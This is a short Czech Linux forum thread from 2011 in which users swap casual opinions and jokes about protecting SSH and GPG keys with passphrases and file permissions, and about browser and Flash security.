    Jendа avatar 13.7.2011 17:18 Jendа | skóre: 78 | blog: Jenda | JO70FB
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    BTW: Doufam, ze ty ssh klice a gpg klice mas chraneni silnou frazi a pouzivas agenty, jinak si zaslouzis, aby ti to uzivatel www-data zobrazil na http serveru:)
    Naštěstí nemají ostatní právo pro čtení.
    13.7.2011 20:32 Hoody
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    Naneštěstí má Chuck Norris roota
    pavlix avatar 14.7.2011 02:15 pavlix | skóre: 54 | blog: pavlix
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    Naštěstí nemá root Chucka Norrise.
    Já už tu vlastně ani nejsem. Abclinuxu umřelo.
    13.7.2011 20:35 SPM | skóre: 28
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    Hlavně tohleto je lepší, když to vůbec neni na disku nebo jinym zařízení s FS...
    18.7.2011 09:49 Jan Grmela | skóre: 45 | blog: Kilo šťávy z lachtana | Brno
    Rozbalit Rozbalit vše Re: Jak je to s tou bezpečností...
    Nejlepší řešení je separátní počítač. Při dnešní cenách to vyjde nastejno jako se drbat s dokonalým nastavením softwarových omezení. A navíc bezpečnostně je to bezkonkurenční :)

    P.S.: Osobně tyhle věci už dávno neřeším. Že by se mi někdo proboxoval z browseru do PC považuju za dost nepravděpodobné pokud člověk denně nestahuje kinderporno a tuny warezeu. Jediné, čeho se bojím, je Fleš -- na ten mám ale ve všech prohlížečích click-to-flash tudíž i zde je riziko minimální. A ani ne tak kvůli bezpečnosti jako spíše příšerné žravosti Fleše a tomu, že reklamy v něm realizované jsou obvykle extra otravné.

    Založit nové vláknoNahoru

    ISSN 1214-1267   www.czech-server.cz
    © 1999-2015 Nitemedia s. r. o. Všechna práva vyhrazena.